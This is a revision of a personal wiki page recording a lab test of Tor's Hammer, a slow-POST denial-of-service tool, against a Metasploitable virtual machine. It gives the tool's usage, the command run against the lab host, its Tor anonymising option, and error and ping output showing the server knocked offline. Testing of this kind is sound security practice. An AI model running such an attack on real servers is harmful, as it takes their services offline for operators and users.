Revision as of 04:02, 29 March 2016

Tor's Hammer Slow Body DoS Attack

Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service (DoS). It does this by sending a POST request with a large declared content-length, then sending data one bit at a time.

Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.

We'll test this tool out on the Metasploitable machine, which is running Apache 2.2.8, and see if it is vulnerable to the Tor's Hammer DoS attack. If so, we'll mount the attack.

Python Script

To run this attack, use the torshammer.py script from the link above.

$ python torshammer.py

/*
 * Tor's Hammer
 * Slow POST DoS Testing Tool
 * Version 1.0 Beta
 * Anon-ymized via Tor
 */
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256

Run this agains the IP address of the Metasploitable machine, 10.0.0.27:

# python torshammer.py -t 10.0.0.27

This will run with the default number of threads (256).

Results

This works like a charm, bringing the target 10.0.0.27 to its knees:

Bingo!

Note that there are a large number of errors printed,

error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-65:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-17:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__

However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.

Bringing Down The Server

Ping Down

At some point during the attack, the machine stopped responding to ping:

ping: sendto: Host is down
Request timeout for icmp_seq 874
ping: sendto: Host is down
Request timeout for icmp_seq 875
ping: sendto: Host is down
Request timeout for icmp_seq 876
ping: sendto: Host is down
Request timeout for icmp_seq 877
ping: sendto: Host is down
Request timeout for icmp_seq 878
ping: sendto: Host is down
Request timeout for icmp_seq 879
ping: sendto: Host is down
Request timeout for icmp_seq 880
ping: sendto: Host is down
Request timeout for icmp_seq 881
ping: sendto: Host is down
Request timeout for icmp_seq 882
ping: sendto: Host is down
Request timeout for icmp_seq 883
ping: sendto: Host is down
Request timeout for icmp_seq 884
ping: sendto: Host is down
Request timeout for icmp_seq 885
ping: sendto: Host is down
Request timeout for icmp_seq 886
ping: sendto: Host is down
Request timeout for icmp_seq 887
ping: sendto: Host is down
Request timeout for icmp_seq 888
ping: sendto: Host is down
Request timeout for icmp_seq 889
ping: sendto: Host is down
Request timeout for icmp_seq 890
ping: sendto: Host is down
Request timeout for icmp_seq 891
ping: sendto: Host is down
Request timeout for icmp_seq 892
Request timeout for icmp_seq 893
Request timeout for icmp_seq 894
Request timeout for icmp_seq 895
Request timeout for icmp_seq 896
Request timeout for icmp_seq 897
Request timeout for icmp_seq 898
Request timeout for icmp_seq 899
Request timeout for icmp_seq 900
Request timeout for icmp_seq 901
Request timeout for icmp_seq 902
Request timeout for icmp_seq 903
Request timeout for icmp_seq 904
Request timeout for icmp_seq 905
Request timeout for icmp_seq 906
Request timeout for icmp_seq 907

Memory Squeeze

Turns out, the machine ran out of memory, and the network device began dropping packets:

This attack completely knocked the server offline.

Flags

@@ Line 77: / Line 77: @@
 However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.
-==Bringing Down Ping==
+==Bringing Down The Server==
+===Ping Down===
 At some point during the attack, the machine stopped responding to ping:
@@ Line 137: / Line 139: @@
 </pre>
-This attack completely knocked the server offline.
+===Memory Squeeze===
+Turns out, the machine ran out of memory, and the network device began dropping packets:
+This attack '''completely''' knocked the server offline.
+[[Image:TorsHammer_OfflineMemSqueeze.png|500px]]
 =Flags=
 {{MSFlag}}

Metasploitable/TorsHammer: Difference between revisions

From charlesreid1